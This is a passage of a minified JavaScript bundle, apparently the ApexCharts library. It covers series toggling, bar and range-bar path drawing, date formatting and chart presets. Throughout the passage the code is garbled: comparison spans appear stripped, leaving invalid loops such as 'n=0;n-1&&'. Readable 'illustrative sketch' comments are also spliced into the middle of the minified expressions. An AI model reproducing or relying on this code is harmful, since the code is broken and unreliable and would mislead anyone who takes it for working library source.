0!==arguments[2])||arguments[2],i=this.w,t=k.clone(i.globals.initialSeries);i.globals.previousPaths=[],n?(i.globals.collapsedSeries=[],i.globals.ancillaryCollapsedSeries=[],i.globals.collapsedSeriesIndices=[],i.globals.ancillaryCollapsedSeriesIndices=[]):t=this.emptyCollapsedSeries(t),i.config.series=t,e&&(a&&(i.globals.zoomed=!1,this.ctx.updateHelpers.revertDefaultAxisMinMax()),this.ctx.updateHelpers._updateSeries(t,i.config.chart.animations.dynamicAnimation.enabled))}},{key:"emptyCollapsedSeries",value:function(e){for(var a=this.w,n=0;n-1&&(e[n].data=[]);return e}},{key:"toggleSeriesOnHover",value:function(e,a){var n=this.w;a||(a=e.target);var i=n.globals.dom.baseEl.querySelectorAll(".apexcharts-series, .apexcharts-datalabels");if("mousemove"===e.type){var t=parseInt(a.getAttribute("rel"),10)-1,r=null,o=null;n.globals.axisCharts||"radialBar"===n.config.chart.type?n.globals.axisCharts?(r=n.globals.dom.baseEl.querySelector(".apexcharts-series[data\\:realIndex='".concat(t,"']")),o=n.globals.dom.baseEl.querySelector(".apexcharts-datalabels[data\\:realIndex='".concat(t,"']"))):r=n.globals.dom.baseEl.querySelector(".apexcharts-series[rel='".concat(t+1,"']")):r=n.globals.dom.baseEl.querySelector(".apexcharts-series[rel='".concat(t+1,"'] path"));for(var s=0;s=e.from&&i<=e.to&&t[a].classList.remove(n.legendInactiveClass)}}(i.config.plotOptions.heatmap.colorScale.ranges[o])}else"mouseout"===e.type&&r("remove")}},{key:"getActiveConfigSeriesIndex",value:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0],a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"asc",n=this.w,i=0;if(n.config.series.length>1)for(var t=n.config.series.map((function(a,i){var t=!1;return e&&(t="bar"===n.config.series[i].type||"column"===n.config.series[i].type),a.data&&a.data.length>0&&!t?i:-1})),r="asc"===a?0:t.length-1;"asc"===a?r=0;"asc"===a?r++:r--)if(-1!==t[r]){i=t[r];break}return i}},{key:"getPreviousPaths",value:function(){var e=this.w;function a(a,n,i){for(var 
t=a[n].childNodes,r={type:i,paths:[],realIndex:a[n].getAttribute("data:realIndex")},o=0;o0)for(var i=function(a){for(var n=e.globals.dom.baseEl.querySelectorAll(".apexcharts-".concat(e.config.chart.type," .apexcharts-series[data\\:realIndex='").concat(a,"'] rect")),i=[],t=function(e){var a=function(a){return n[e].getAttribute(a)},t={x:parseFloat(a("x")),y:parseFloat(a("y")),width:parseFloat(a("width")),height:parseFloat(a("height"))};i.push({rect:t,color:n[e].getAttribute("color")})},r=0;r0)for(var i=0;i0?e:[]}))}}]),e}(),D=function(){function e(a){s(this,e),this.w=a.w,this.barCtx=a}return u(e,[{key:"initVariables",value:function(e){var a=this.w;this.barCtx.series=e,this.barCtx.totalItems=0,this.barCtx.seriesLen=0,this.barCtx.visibleI=-1,this.barCtx.visibleItems=1;for(var n=0;n0&&(this.barCtx.seriesLen=this.barCtx.seriesLen+1,this.barCtx.totalItems+=e[n].length),a.globals.isXNumeric)for(var i=0;ia.globals.minX&&a.globals.seriesX[n][i]0&&(i=l.globals.minXDiff/d),(r=i/this.barCtx.seriesLen*parseInt(this.barCtx.barOptions.columnWidth,10)/100)<1&&(r=1)}o=l.globals.gridHeight-this.barCtx.baseLineY[this.barCtx.yaxisIndex]-(this.barCtx.isReversed?l.globals.gridHeight:0)+(this.barCtx.isReversed?2*this.barCtx.baseLineY[this.barCtx.yaxisIndex]:0),e=l.globals.padHorizontal+(i-r*this.barCtx.seriesLen)/2}return{x:e,y:a,yDivision:n,xDivision:i,barHeight:t,barWidth:r,zeroH:o,zeroW:s}}},{key:"getPathFillColor",value:function(e,a,n,i){var t=this.w,r=new L(this.barCtx.ctx),o=null,s=this.barCtx.barOptions.distributed?n:a;return this.barCtx.barOptions.colors.ranges.length>0&&this.barCtx.barOptions.colors.ranges.map((function(i){e[a][n]>=i.from&&e[a][n]<=i.to&&(o=i.color)})),t.config.series[a].data[n]&&t.config.series[a].data[n].fillColor&&(o=t.config.series[a].data[n].fillColor),r.fillPath({seriesNumber:this.barCtx.barOptions.distributed?s:i,dataPointIndex:n,color:o,value:e[a][n]})}},{key:"getStrokeWidth",value:function(e,a,n){var i=0,t=this.w;return void 0===this.barCtx.series[e][a]||null===this.barCtx.series[e][a]?this.barCtx.isNullValue=!0:this.barCtx.isNullValue=!1,t.config.stroke.show&&(this.barCtx.isNullValue||(i=Array.isArray(this.barCtx.strokeWidth)?this.barCtx.strokeWidth[n]:this.barCtx.strokeWidth)),i}},{key:"barBackground",value:function(e){var a=e.j,n=e.i,i=e.x1,t=e.x2,r=e.y1,o=e.y2,s=e.elSeries,l=this.w,u=new S(this.barCtx.ctx),c=new K(this.barCtx.ctx).getActiveConfigSeriesIndex();if(this.barCtx.barOptions.colors.backgroundBarColors.length>0&&c===n){a>=this.barCtx.barOptions.colors.backgroundBarColors.length&&(a%=this.barCtx.barOptions.colors.backgroundBarColors.length);var d=this.barCtx.barOptions.colors.backgroundBarColors[a],h=u.drawRect(void 0!==i?i:0,void 0!==r?r:0,void 0!==t?t:l.globals.gridWidth,void 0!==o?o:l.globals.gridHeight,this.barCtx.barOptions.colors.backgroundBarRadius,d,this.barCtx.barOptions.colors.backgroundBarOpacity);s.add(h),h.node.classList.add("apexcharts-backgroundBar")}}},{key:"getColumnPaths",value:function(e){var a=e.barWidth,n=e.barXPosition,i=e.yRatio,t=e.y1,r=e.y2,o=e.strokeWidth,s=e.series,l=e.realIndex,u=e.i,c=e.j,d=e.w,h=new S(this.barCtx.ctx);(o=Array.isArray(o)?o[l]:o)||(o=0);var p={barWidth:a,strokeWidth:o,yRatio:i,barXPosition:n,y1:t,y2:r},m=this.getRoundedBars(d,p,s,u,c),f=n,v=n+a,g=h.move(f,t),b=h.move(f,t),k=h.line(v-o,t);return 
d.globals.previousPaths.length>0&&(b=this.barCtx.getPreviousPath(l,c,!1)),g=g+h.line(f,m.y2)+m.pathWithRadius+h.line(v-o,m.y2)+k+k+"z",b=b+h.line(f,t)+k+k+k+k+k+h.line(f,t),d.config.chart.stacked&&(this.barCtx.yArrj.push(m.y2),this.barCtx.yArrjF.push(Math.abs(t-m.y2)),this.barCtx.yArrjVal.push(this.barCtx.series[u][c])),{pathTo:g,pathFrom:b}}},{key:"getBarpaths",value:function(e){var a=e.barYPosition,n=e.barHeight,i=e.x1,t=e.x2,r=e.strokeWidth,o=e.series,s=e.realIndex,l=e.i,u=e.j,c=e.w,d=new S(this.barCtx.ctx);(r=Array.isArray(r)?r[s]:r)||(r=0);var h={barHeight:n,strokeWidth:r,barYPosition:a,x2:t,x1:i},p=this.getRoundedBars(c,h,o,l,u),m=d.move(i,a),f=d.move(i,a);c.globals.previousPaths.length>0&&(f=this.barCtx.getPreviousPath(s,u,!1));var v=a,g=a+n,b=d.line(i,g-r);return m=m+d.line(p.x2,v)+p.pathWithRadius+d.line(p.x2,g-r)+b+b+"z",f=f+d.line(i,v)+b+b+b+b+b+d.line(i,v),c.config.chart.stacked&&(this.barCtx.xArrj.push(p.x2),this.barCtx.xArrjF.push(Math.abs(i-p.x2)),this.barCtx.xArrjVal.push(this.barCtx.series[l][u])),{pathTo:m,pathFrom:f}}},{key:"getRoundedBars",value:function(e,a,n,i,t){var r=new S(this.barCtx.ctx),o=0,s=e.config.plotOptions.bar.borderRadius,l=Array.isArray(s);if(o=l?s[i>s.length-1?s.length-1:i]:s,e.config.chart.stacked&&n.length>1&&i!==this.barCtx.radiusOnSeriesNumber&&!l&&(o=0),this.barCtx.isHorizontal){var u="",c=a.x2;if(Math.abs(a.x1-a.x2)0:n[i][t]<0;d&&(o*=-1),c-=o,u=r.quadraticCurve(c+o,a.barYPosition,c+o,a.barYPosition+(d?-1*o:o))+r.line(c+o,a.barYPosition+a.barHeight-a.strokeWidth-(d?-1*o:o))+r.quadraticCurve(c+o,a.barYPosition+a.barHeight-a.strokeWidth,c,a.barYPosition+a.barHeight-a.strokeWidth)}return{pathWithRadius:u,x2:c}}var h="",p=a.y2;if(Math.abs(a.y1-a.y2)=0;o--)this.barCtx.zeroSerieses.indexOf(o)>-1&&o===this.radiusOnSeriesNumber&&(this.barCtx.radiusOnSeriesNumber-=1);for(var s=a.length-1;s>=0;s--)n.globals.collapsedSeriesIndices.indexOf(this.barCtx.radiusOnSeriesNumber)>-1&&(this.barCtx.radiusOnSeriesNumber-=1)}},{key:"getXForValue",value:function(e,a){var n=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],i=n?a:null;return null!=e&&(i=a+e/this.barCtx.invertedYRatio-2*(this.barCtx.isReversed?e/this.barCtx.invertedYRatio:0)),i}},{key:"getYForValue",value:function(e,a){var n=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],i=n?a:null;return null!=e&&(i=a-e/this.barCtx.yRatio[this.barCtx.yaxisIndex]+2*(this.barCtx.isReversed?e/this.barCtx.yRatio[this.barCtx.yaxisIndex]:0)),i}},{key:"getGoalValues",value:function(e,a,n,i,t){var r=this,o=this.w,s=[];return o.globals.seriesGoals[i]&&o.globals.seriesGoals[i][t]&&Array.isArray(o.globals.seriesGoals[i][t])&&o.globals.seriesGoals[i][t].forEach((function(i){var t;s.push((c(t={},e,"x"===e?r.getXForValue(i.value,a,!1):r.getYForValue(i.value,n,!1)),c(t,"attrs",i),t))})),s}},{key:"drawGoalLine",value:function(e){var a=e.barXPosition,n=e.barYPosition,i=e.goalX,t=e.goalY,r=e.barWidth,o=e.barHeight,s=new S(this.barCtx.ctx),l=s.group({className:"apexcharts-bar-goals-groups"}),u=null;return this.barCtx.isHorizontal?Array.isArray(i)&&i.forEach((function(e){var a=void 0!==e.attrs.strokeHeight?e.attrs.strokeHeight:o/2,i=n+a+o/2;u=s.drawLine(e.x,i-2*a,e.x,i,e.attrs.strokeColor?e.attrs.strokeColor:void 0,e.attrs.strokeDashArray,e.attrs.strokeWidth?e.attrs.strokeWidth:2,e.attrs.strokeLineCap),l.add(u)})):Array.isArray(t)&&t.forEach((function(e){var n=void 0!==e.attrs.strokeWidth?e.attrs.strokeWidth:r/2,i=a+n+r/2;u=s.drawLine(i-2*n,e.y,i,e.y,e.attrs.strokeColor?e.attrs.strokeColor:void 
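/* Illustrative sketch of what getColumnPaths/getRoundedBars assemble above: an
   SVG path string for a column whose top corners are rounded with quadratic
   curves, radius taken from plotOptions.bar.borderRadius. Names are illustrative. */
function roundedColumnPath(x, yBase, yTop, width, r) {
  // SVG y grows downward, so yTop < yBase for a positive value
  return 'M ' + x + ' ' + yBase +
         ' L ' + x + ' ' + (yTop + r) +
         ' Q ' + x + ' ' + yTop + ' ' + (x + r) + ' ' + yTop +
         ' L ' + (x + width - r) + ' ' + yTop +
         ' Q ' + (x + width) + ' ' + yTop + ' ' + (x + width) + ' ' + (yTop + r) +
         ' L ' + (x + width) + ' ' + yBase + ' Z';
}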
0,e.attrs.strokeDashArray,e.attrs.strokeHeight?e.attrs.strokeHeight:2,e.attrs.strokeLineCap),l.add(u)})),l}}]),e}(),_=function(){function e(a,n){s(this,e),this.ctx=a,this.w=a.w;var i=this.w;this.barOptions=i.config.plotOptions.bar,this.isHorizontal=this.barOptions.horizontal,this.strokeWidth=i.config.stroke.width,this.isNullValue=!1,this.isRangeBar=i.globals.seriesRangeBar.length&&this.isHorizontal,this.xyRatios=n,null!==this.xyRatios&&(this.xRatio=n.xRatio,this.initialXRatio=n.initialXRatio,this.yRatio=n.yRatio,this.invertedXRatio=n.invertedXRatio,this.invertedYRatio=n.invertedYRatio,this.baseLineY=n.baseLineY,this.baseLineInvertedY=n.baseLineInvertedY),this.yaxisIndex=0,this.seriesLen=0,this.barHelpers=new D(this)}return u(e,[{key:"draw",value:function(e,a){var n=this.w,i=new S(this.ctx),t=new A(this.ctx,n);e=t.getLogSeries(e),this.series=e,this.yRatio=t.getLogYRatios(this.yRatio),this.barHelpers.initVariables(e);var o=i.group({class:"apexcharts-bar-series apexcharts-plot-series"});n.config.dataLabels.enabled&&this.totalItems>this.barOptions.dataLabels.maxItems&&console.warn("WARNING: DataLabels are enabled but there are too many to display. This may cause performance issue when rendering.");for(var s=0,l=0;s0&&(this.visibleI=this.visibleI+1);var y=0,x=0;this.yRatio.length>1&&(this.yaxisIndex=g),this.isReversed=n.config.yaxis[this.yaxisIndex]&&n.config.yaxis[this.yaxisIndex].reversed;var w=this.barHelpers.initialPositions();m=w.y,y=w.barHeight,c=w.yDivision,h=w.zeroW,p=w.x,x=w.barWidth,u=w.xDivision,d=w.zeroH,this.horizontal||v.push(p+x/2);for(var M=i.group({class:"apexcharts-datalabels","data:realIndex":g}),j=i.group({class:"apexcharts-bar-goals-markers",style:"pointer-events: none"}),C=0;C0&&v.push(p+x/2),f.push(m);var z=this.barHelpers.getPathFillColor(e,s,C,g);this.renderSeries({realIndex:g,pathFill:z,j:C,i:s,pathFrom:B.pathFrom,pathTo:B.pathTo,strokeWidth:P,elSeries:b,x:p,y:m,series:e,barHeight:y,barWidth:x,elDataLabelsWrap:M,elGoalsMarkers:j,visibleSeries:this.visibleI,type:"bar"})}n.globals.seriesXvalues[g]=v,n.globals.seriesYvalues[g]=f,o.add(b)}return o}},{key:"renderSeries",value:function(e){var a=e.realIndex,n=e.pathFill,i=e.lineFill,t=e.j,r=e.i,o=e.pathFrom,s=e.pathTo,l=e.strokeWidth,u=e.elSeries,c=e.x,d=e.y,h=e.y1,p=e.y2,m=e.series,f=e.barHeight,v=e.barWidth,g=e.barYPosition,b=e.elDataLabelsWrap,k=e.elGoalsMarkers,y=e.visibleSeries,A=e.type,w=this.w,M=new S(this.ctx);i||(i=this.barOptions.distributed?w.globals.stroke.colors[t]:w.globals.stroke.colors[a]),w.config.series[r].data[t]&&w.config.series[r].data[t].strokeColor&&(i=w.config.series[r].data[t].strokeColor),this.isNullValue&&(n="none");var j=t/w.config.chart.animations.animateGradually.delay*(w.config.chart.animations.speed/w.globals.dataPoints)/2.4,C=M.renderPaths({i:r,j:t,realIndex:a,pathFrom:o,pathTo:s,stroke:i,strokeWidth:l,strokeLineCap:w.config.stroke.lineCap,fill:n,animationDelay:j,initialSpeed:w.config.chart.animations.speed,dataChangeSpeed:w.config.chart.animations.dynamicAnimation.speed,className:"apexcharts-".concat(A,"-area")});C.attr("clip-path","url(#gridRectMask".concat(w.globals.cuid,")"));var P=w.config.forecastDataPoints;P.count>0&&t>=w.globals.dataPoints-P.count&&(C.node.setAttribute("stroke-dasharray",P.dashArray),C.node.setAttribute("stroke-width",P.strokeWidth),C.node.setAttribute("fill-opacity",P.fillOpacity)),void 0!==h&&void 0!==p&&(C.attr("data-range-y1",h),C.attr("data-range-y2",p)),new x(this.ctx).setSelectionFilter(C,a,t),u.add(C);var B=new 
R(this).handleBarDataLabels({x:c,y:d,y1:h,y2:p,i:r,j:t,series:m,realIndex:a,barHeight:f,barWidth:v,barYPosition:g,renderedPath:C,visibleSeries:y});return null!==B&&b.add(B),u.add(b),k&&u.add(k),u}},{key:"drawBarPaths",value:function(e){var a=e.indexes,n=e.barHeight,i=e.strokeWidth,t=e.zeroW,r=e.x,o=e.y,s=e.yDivision,l=e.elSeries,u=this.w,c=a.i,d=a.j;u.globals.isXNumeric&&(o=(u.globals.seriesX[c][d]-u.globals.minX)/this.invertedXRatio-n);var h=o+n*this.visibleI;r=this.barHelpers.getXForValue(this.series[c][d],t);var p=this.barHelpers.getBarpaths({barYPosition:h,barHeight:n,x1:t,x2:r,strokeWidth:i,series:this.series,realIndex:a.realIndex,i:c,j:d,w:u});return u.globals.isXNumeric||(o+=s),this.barHelpers.barBackground({j:d,i:c,y1:h-n*this.visibleI,y2:n*this.seriesLen,elSeries:l}),{pathTo:p.pathTo,pathFrom:p.pathFrom,x:r,y:o,goalX:this.barHelpers.getGoalValues("x",t,null,c,d),barYPosition:h}}},{key:"drawColumnPaths",value:function(e){var a=e.indexes,n=e.x,i=e.y,t=e.xDivision,r=e.barWidth,o=e.zeroH,s=e.strokeWidth,l=e.elSeries,u=this.w,c=a.realIndex,d=a.i,h=a.j,p=a.bc;if(u.globals.isXNumeric){var m=c;u.globals.seriesX[c].length||(m=u.globals.maxValsInArrayIndex),n=(u.globals.seriesX[m][h]-u.globals.minX)/this.xRatio-r*this.seriesLen/2}var f=n+r*this.visibleI;i=this.barHelpers.getYForValue(this.series[d][h],o);var v=this.barHelpers.getColumnPaths({barXPosition:f,barWidth:r,y1:o,y2:i,strokeWidth:s,series:this.series,realIndex:a.realIndex,i:d,j:h,w:u});return u.globals.isXNumeric||(n+=t),this.barHelpers.barBackground({bc:p,j:h,i:d,x1:f-s/2-r*this.visibleI,x2:r*this.seriesLen+s/2,elSeries:l}),{pathTo:v.pathTo,pathFrom:v.pathFrom,x:n,y:i,goalY:this.barHelpers.getGoalValues("y",null,o,d,h),barXPosition:f}}},{key:"getPreviousPath",value:function(e,a){for(var n,i=this.w,t=0;t0&&parseInt(r.realIndex,10)===parseInt(e,10)&&void 0!==i.globals.previousPaths[t].paths[a]&&(n=i.globals.previousPaths[t].paths[a].d)}return n}}]),e}(),H=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.months31=[1,3,5,7,8,10,12],this.months30=[2,4,6,9,11],this.daysCntOfYear=[0,31,59,90,120,151,181,212,243,273,304,334]}return u(e,[{key:"isValidDate",value:function(e){return!isNaN(this.parseDate(e))}},{key:"getTimeStamp",value:function(e){return Date.parse(e)?this.w.config.xaxis.labels.datetimeUTC?new Date(new Date(e).toISOString().substr(0,25)).getTime():new Date(e).getTime():e}},{key:"getDate",value:function(e){return this.w.config.xaxis.labels.datetimeUTC?new Date(new Date(e).toUTCString()):new Date(e)}},{key:"parseDate",value:function(e){var a=Date.parse(e);if(!isNaN(a))return this.getTimeStamp(e);var n=Date.parse(e.replace(/-/g,"/").replace(/[a-z]+/gi," "));return this.getTimeStamp(n)}},{key:"parseDateWithTimezone",value:function(e){return Date.parse(e.replace(/-/g,"/").replace(/[a-z]+/gi," "))}},{key:"formatDate",value:function(e,a){var n=this.w.globals.locale,i=this.w.config.xaxis.labels.datetimeUTC,t=["\0"].concat(v(n.months)),r=["\x01"].concat(v(n.shortMonths)),o=["\x02"].concat(v(n.days)),s=["\x03"].concat(v(n.shortDays));function l(e,a){var n=e+"";for(a=a||2;n.length12?h-12:0===h?12:h;a=(a=(a=(a=a.replace(/(^|[^\\])HH+/g,"$1"+l(h))).replace(/(^|[^\\])H/g,"$1"+h)).replace(/(^|[^\\])hh+/g,"$1"+l(p))).replace(/(^|[^\\])h/g,"$1"+p);var m=i?e.getUTCMinutes():e.getMinutes();a=(a=a.replace(/(^|[^\\])mm+/g,"$1"+l(m))).replace(/(^|[^\\])m/g,"$1"+m);var f=i?e.getUTCSeconds():e.getSeconds();a=(a=a.replace(/(^|[^\\])ss+/g,"$1"+l(f))).replace(/(^|[^\\])s/g,"$1"+f);var 
g=i?e.getUTCMilliseconds():e.getMilliseconds();a=a.replace(/(^|[^\\])fff+/g,"$1"+l(g,3)),g=Math.round(g/10),a=a.replace(/(^|[^\\])ff/g,"$1"+l(g)),g=Math.round(g/10);var b=h<12?"AM":"PM";a=(a=(a=a.replace(/(^|[^\\])f/g,"$1"+g)).replace(/(^|[^\\])TT+/g,"$1"+b)).replace(/(^|[^\\])T/g,"$1"+b.charAt(0));var k=b.toLowerCase();a=(a=a.replace(/(^|[^\\])tt+/g,"$1"+k)).replace(/(^|[^\\])t/g,"$1"+k.charAt(0));var y=-e.getTimezoneOffset(),x=i||!y?"Z":y>0?"+":"-";if(!i){var S=(y=Math.abs(y))%60;x+=l(Math.floor(y/60))+":"+l(S)}a=a.replace(/(^|[^\\])K/g,"$1"+x);var A=(i?e.getUTCDay():e.getDay())+1;return(a=(a=(a=(a=a.replace(new RegExp(o[0],"g"),o[A])).replace(new RegExp(s[0],"g"),s[A])).replace(new RegExp(t[0],"g"),t[c])).replace(new RegExp(r[0],"g"),r[c])).replace(/\\(.)/g,"$1")}},{key:"getTimeUnitsfromTimestamp",value:function(e,a,n){var i=this.w;void 0!==i.config.xaxis.min&&(e=i.config.xaxis.min),void 0!==i.config.xaxis.max&&(a=i.config.xaxis.max);var t=this.getDate(e),r=this.getDate(a),o=this.formatDate(t,"yyyy MM dd HH mm ss fff").split(" "),s=this.formatDate(r,"yyyy MM dd HH mm ss fff").split(" ");return{minMillisecond:parseInt(o[6],10),maxMillisecond:parseInt(s[6],10),minSecond:parseInt(o[5],10),maxSecond:parseInt(s[5],10),minMinute:parseInt(o[4],10),maxMinute:parseInt(s[4],10),minHour:parseInt(o[3],10),maxHour:parseInt(s[3],10),minDate:parseInt(o[2],10),maxDate:parseInt(s[2],10),minMonth:parseInt(o[1],10)-1,maxMonth:parseInt(s[1],10)-1,minYear:parseInt(o[0],10),maxYear:parseInt(s[0],10)}}},{key:"isLeapYear",value:function(e){return e%4==0&&e%100!=0||e%400==0}},{key:"calculcateLastDaysOfMonth",value:function(e,a,n){return this.determineDaysOfMonths(e,a)-n}},{key:"determineDaysOfYear",value:function(e){var a=365;return this.isLeapYear(e)&&(a=366),a}},{key:"determineRemainingDaysOfYear",value:function(e,a,n){var i=this.daysCntOfYear[a]+n;return a>1&&this.isLeapYear()&&i++,i}},{key:"determineDaysOfMonths",value:function(e,a){var n=30;switch(e=k.monthMod(e),!0){case this.months30.indexOf(e)>-1:2===e&&(n=this.isLeapYear(a)?29:28);break;case this.months31.indexOf(e)>-1:default:n=31}return n}}]),e}(),O=function(e){d(n,_);var a=f(n);function n(){return s(this,n),a.apply(this,arguments)}return u(n,[{key:"draw",value:function(e,a){var n=this.w,i=new S(this.ctx);this.rangeBarOptions=this.w.config.plotOptions.rangeBar,this.series=e,this.seriesRangeStart=n.globals.seriesRangeStart,this.seriesRangeEnd=n.globals.seriesRangeEnd,this.barHelpers.initVariables(e);for(var t=i.group({class:"apexcharts-rangebar-series apexcharts-plot-series"}),o=0;o0&&(this.visibleI=this.visibleI+1);var f=0,v=0;this.yRatio.length>1&&(this.yaxisIndex=p);var g=this.barHelpers.initialPositions();d=g.y,u=g.zeroW,c=g.x,v=g.barWidth,s=g.xDivision,l=g.zeroH;for(var b=i.group({class:"apexcharts-datalabels","data:realIndex":p}),y=i.group({class:"apexcharts-rangebar-goals-markers",style:"pointer-events: none"}),x=0;x0}));return i=l.config.plotOptions.bar.rangeBarGroupRows?t+o*h:t+r*this.visibleI+o*h,p>-1&&!l.config.plotOptions.bar.rangeBarOverlap&&(u=l.globals.seriesRangeBar[a][p].overlaps).indexOf(c)>-1&&(i=(r=s.barHeight/u.length)*this.visibleI+o*(100-parseInt(this.barOptions.barHeight,10))/100/2+r*(this.visibleI+u.indexOf(c))+o*h),{barYPosition:i,barHeight:r}}},{key:"drawRangeColumnPaths",value:function(e){var a=e.indexes,n=e.x;e.strokeWidth;var 
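/* Illustrative sketch of the calendar rules implemented by the minified DateTime
   class above (isLeapYear / determineDaysOfMonths), written out in plain form. */
function isLeapYearSketch(year) {
  // Gregorian rule: divisible by 4, except centuries not divisible by 400
  return (year % 4 === 0 && year % 100 !== 0) || year % 400 === 0;
}
function daysInMonthSketch(month, year) {
  // month is 1-12, matching the months31/months30 lookup tables above
  if (month === 2) return isLeapYearSketch(year) ? 29 : 28;
  return [1, 3, 5, 7, 8, 10, 12].indexOf(month) > -1 ? 31 : 30;
}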
i=e.xDivision,t=e.barWidth,r=e.zeroH,o=this.w,s=a.i,l=a.j,u=this.yRatio[this.yaxisIndex],c=a.realIndex,d=this.getRangeValue(c,l),h=Math.min(d.start,d.end),p=Math.max(d.start,d.end);o.globals.isXNumeric&&(n=(o.globals.seriesX[s][l]-o.globals.minX)/this.xRatio-t/2);var m=n+t*this.visibleI;void 0===this.series[s][l]||null===this.series[s][l]?h=r:(h=r-h/u,p=r-p/u);var f=Math.abs(p-h),v=this.barHelpers.getColumnPaths({barXPosition:m,barWidth:t,y1:h,y2:p,strokeWidth:this.strokeWidth,series:this.seriesRangeEnd,realIndex:a.realIndex,i:c,j:l,w:o});return o.globals.isXNumeric||(n+=i),{pathTo:v.pathTo,pathFrom:v.pathFrom,barHeight:f,x:n,y:p,goalY:this.barHelpers.getGoalValues("y",null,r,s,l),barXPosition:m}}},{key:"drawRangeBarPaths",value:function(e){var a=e.indexes,n=e.y,i=e.y1,t=e.y2,r=e.yDivision,o=e.barHeight,s=e.barYPosition,l=e.zeroW,u=this.w,c=l+i/this.invertedYRatio,d=l+t/this.invertedYRatio,h=Math.abs(d-c),p=this.barHelpers.getBarpaths({barYPosition:s,barHeight:o,x1:c,x2:d,strokeWidth:this.strokeWidth,series:this.seriesRangeEnd,i:a.realIndex,realIndex:a.realIndex,j:a.j,w:u});return u.globals.isXNumeric||(n+=r),{pathTo:p.pathTo,pathFrom:p.pathFrom,barWidth:h,x:d,goalX:this.barHelpers.getGoalValues("x",l,null,a.realIndex,a.j),y:n}}},{key:"getRangeValue",value:function(e,a){var n=this.w;return{start:n.globals.seriesRangeStart[e][a],end:n.globals.seriesRangeEnd[e][a]}}},{key:"getTooltipValues",value:function(e){var a=e.ctx,n=e.seriesIndex,i=e.dataPointIndex,t=e.y1,r=e.y2,o=e.w,s=o.globals.seriesRangeStart[n][i],l=o.globals.seriesRangeEnd[n][i],u=o.globals.labels[i],c=o.config.series[n].name?o.config.series[n].name:"",d=o.config.tooltip.y.formatter,h=o.config.tooltip.y.title.formatter,p={w:o,seriesIndex:n,dataPointIndex:i,start:s,end:l};"function"==typeof h&&(c=h(c,p)),Number.isFinite(t)&&Number.isFinite(r)&&(s=t,l=r,o.config.series[n].data[i].x&&(u=o.config.series[n].data[i].x+":"),"function"==typeof d&&(u=d(u,p)));var m="",f="",v=o.globals.colors[n];if(void 0===o.config.tooltip.x.formatter)if("datetime"===o.config.xaxis.type){var g=new H(a);m=g.formatDate(g.getDate(s),o.config.tooltip.x.format),f=g.formatDate(g.getDate(l),o.config.tooltip.x.format)}else m=s,f=l;else m=o.config.tooltip.x.formatter(s),f=o.config.tooltip.x.formatter(l);return{start:s,end:l,startVal:m,endVal:f,ylabel:u,color:v,seriesName:c}}},{key:"buildCustomTooltipHTML",value:function(e){return'
<div class="apexcharts-tooltip-rangebar"><div> <span class="series-name" style="color: '+e.color+'">'+(e.seriesName||"")+'</span></div><div> <span class="category">'+e.ylabel+' </span> <span class="value start-value">'+e.start+'</span> <span class="separator">-</span> <span class="value end-value">'+e.end+"</span></div></div>
"}}]),n}(),V=function(){function e(a){s(this,e),this.opts=a}return u(e,[{key:"line",value:function(){return{chart:{animations:{easing:"swing"}},dataLabels:{enabled:!1},stroke:{width:5,curve:"straight"},markers:{size:0,hover:{sizeOffset:6}},xaxis:{crosshairs:{width:1}}}}},{key:"sparkline",value:function(e){return this.opts.yaxis[0].show=!1,this.opts.yaxis[0].title.text="",this.opts.yaxis[0].axisBorder.show=!1,this.opts.yaxis[0].axisTicks.show=!1,this.opts.yaxis[0].floating=!0,k.extend(e,{grid:{show:!1,padding:{left:0,right:0,top:0,bottom:0}},legend:{show:!1},xaxis:{labels:{show:!1},tooltip:{enabled:!1},axisBorder:{show:!1},axisTicks:{show:!1}},chart:{toolbar:{show:!1},zoom:{enabled:!1}},dataLabels:{enabled:!1}})}},{key:"bar",value:function(){return{chart:{stacked:!1,animations:{easing:"swing"}},plotOptions:{bar:{dataLabels:{position:"center"}}},dataLabels:{style:{colors:["#fff"]},background:{enabled:!1}},stroke:{width:0,lineCap:"round"},fill:{opacity:.85},legend:{markers:{shape:"square",radius:2,size:8}},tooltip:{shared:!1,intersect:!0},xaxis:{tooltip:{enabled:!1},tickPlacement:"between",crosshairs:{width:"barWidth",position:"back",fill:{type:"gradient"},dropShadow:{enabled:!1},stroke:{width:0}}}}}},{key:"candlestick",value:function(){var e=this;return{stroke:{width:1,colors:["#333"]},fill:{opacity:1},dataLabels:{enabled:!1},tooltip:{shared:!0,custom:function(a){var n=a.seriesIndex,i=a.dataPointIndex,t=a.w;return e._getBoxTooltip(t,n,i,["Open","High","","Low","Close"],"candlestick")}},states:{active:{filter:{type:"none"}}},xaxis:{crosshairs:{width:1}}}}},{key:"boxPlot",value:function(){var e=this;return{chart:{animations:{dynamicAnimation:{enabled:!1}}},stroke:{width:1,colors:["#24292e"]},dataLabels:{enabled:!1},tooltip:{shared:!0,custom:function(a){var n=a.seriesIndex,i=a.dataPointIndex,t=a.w;return e._getBoxTooltip(t,n,i,["Minimum","Q1","Median","Q3","Maximum"],"boxPlot")}},markers:{size:5,strokeWidth:1,strokeColors:"#111"},xaxis:{crosshairs:{width:1}}}}},{key:"rangeBar",value:function(){return{stroke:{width:0,lineCap:"square"},plotOptions:{bar:{borderRadius:0,dataLabels:{position:"center"}}},dataLabels:{enabled:!1,formatter:function(e,a){a.ctx;var n=a.seriesIndex,i=a.dataPointIndex,t=a.w,r=t.globals.seriesRangeStart[n][i];return t.globals.seriesRangeEnd[n][i]-r},background:{enabled:!1},style:{colors:["#fff"]}},tooltip:{shared:!1,followCursor:!0,custom:function(e){return e.w.config.plotOptions&&e.w.config.plotOptions.bar&&e.w.config.plotOptions.bar.horizontal?function(e){var a=new O(e.ctx,null),n=a.getTooltipValues(e),i=n.color,t=n.seriesName,r=n.ylabel,o=n.startVal,s=n.endVal;return a.buildCustomTooltipHTML({color:i,seriesName:t,ylabel:r,start:o,end:s})}(e):function(e){var a=new O(e.ctx,null),n=a.getTooltipValues(e),i=n.color,t=n.seriesName,r=n.ylabel,o=n.start,s=n.end;return 